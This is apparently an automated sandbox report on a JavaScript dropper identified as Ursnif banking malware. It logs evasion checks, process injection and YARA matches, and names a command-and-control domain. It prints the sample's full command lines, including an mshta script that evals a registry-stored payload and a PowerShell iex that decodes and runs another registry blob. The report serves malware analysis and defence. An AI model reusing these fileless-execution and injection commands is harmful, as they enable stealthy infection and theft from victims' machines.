Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2547
Found evasive API chain (date check)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain checking for process token informationShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3380Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004D7EE6 memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,4_2_004D7EE6
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,4_2_04AB940E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AACDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,4_2_04AACDF2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AA8181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,4_2_04AA8181
Contains functionality to query local drivesShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB7CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,4_2_04AB7CDC
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: explorer.exe, 00000010.00000002.1272379842.0000000007340000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000010.00000002.1272379842.0000000007340000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000010.00000002.1272379842.0000000007340000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000010.00000002.1272379842.0000000007340000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733C1006 LdrInitializeThunk,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_733C1006
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB6450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,4_2_04AB6450
Contains functionality to read the PEBShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733DC590 mov eax, dword ptr fs:[00000030h]4_2_733DC590
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733DC0D0 push dword ptr fs:[00000030h]4_2_733DC0D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733DC4C6 mov eax, dword ptr fs:[00000030h]4_2_733DC4C6
Contains functionality to register its own exception handlerShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733C223F InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,4_2_733C223F
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AAC0D6 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,LdrInitializeThunk,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,4_2_04AAC0D6

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: ZyQNToG.txt.0.drJump to dropped file
Allocates memory in foreign processesShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\System32\control.exe base: 3C0000 protect: page execute and read and writeJump to behavior
Creates a thread in another existing process (thread injection)Show sources
Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 352A1000
Maps a DLL or memory area into another processShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeThread register set: target process: 4740Jump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 3C0000Jump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\ZyQNToG.txtJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'Jump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: regsvr32.exe, 00000003.00000002.1231089131.0000000001840000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1233989902.0000000002D40000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.1277361914.000001C7C6990000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1256681400.0000000001170000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.1231089131.0000000001840000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1233989902.0000000002D40000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.1277361914.000001C7C6990000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1256681400.0000000001170000.00000002.00000001.sdmpBinary or memory string: Progman
Source: regsvr32.exe, 00000003.00000002.1231089131.0000000001840000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1233989902.0000000002D40000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.1277361914.000001C7C6990000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1256681400.0000000001170000.00000002.00000001.sdmpBinary or memory string: hProgram ManagerWE
Source: regsvr32.exe, 00000003.00000002.1231089131.0000000001840000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1233989902.0000000002D40000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.1277361914.000001C7C6990000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1256681400.0000000001170000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: explorer.exe, 00000010.00000002.1248819501.0000000000A30000.00000004.00000020.sdmpBinary or memory string: Progman{
Source: explorer.exe, 00000010.00000002.1248819501.0000000000A30000.00000004.00000020.sdmpBinary or memory string: PProgmancci\Ap

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,4_2_733C10EC
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004D39DF cpuid 4_2_004D39DF
Queries the installation date of WindowsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Contains functionality to create pipes for IPCShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AA4134 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,4_2_04AA4134
Contains functionality to query local / system timeShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733C1C57 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,4_2_733C1C57
Contains functionality to query the account / user nameShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004D39DF GetUserNameW,GetUserNameW,HeapFree,HeapFree,4_2_004D39DF
Contains functionality to query windows versionShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733C17E2 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,4_2_733C17E2
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1064584505.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1107254349.0000000004D5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064674452.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064703086.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064524352.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064632588.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064218194.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1276679333.000000000033E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1190242494.0000000000700000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064435714.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064335431.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3064, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 4740, type: MEMORY

Remote Access Functionality:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1064584505.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1107254349.0000000004D5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064674452.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064703086.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064524352.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064632588.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064218194.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1276679333.000000000033E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1190242494.0000000000700000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064435714.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064335431.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3064, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 4740, type: MEMORY

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "318", "system": "1ce5daae129a99d4ae35102f58b42ad9hh", "size": "200780", "crc": "2", "action": "00000000", "id": "2000", "time": "1587610402", "user": "31b341dd54c8a3b79c4b2eb50a222cb3", "hash": "0x0d8e127a", "soft": "3"}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 224563 Sample: job_attach_t9o.js Startdate: 22/04/2020 Architecture: WINDOWS Score: 100 42 api10.dianer.at 2->42 46 Multi AV Scanner detection for domain / URL 2->46 48 Found malware configuration 2->48 50 Yara detected  Ursnif 2->50 52 7 other signatures 2->52 11 wscript.exe 3 2->11         started        15 iexplore.exe 5 432 2->15         started        signatures3 process4 file5 40 C:\Users\user\AppData\Local\...\ZyQNToG.txt, PE32 11->40 dropped 62 Benign windows process drops PE files 11->62 64 JScript performs obfuscated calls to suspicious functions 11->64 17 regsvr32.exe 11->17         started        19 iexplore.exe 10 259 15->19         started        22 iexplore.exe 258 15->22         started        24 iexplore.exe 258 15->24         started        signatures6 process7 dnsIp8 26 regsvr32.exe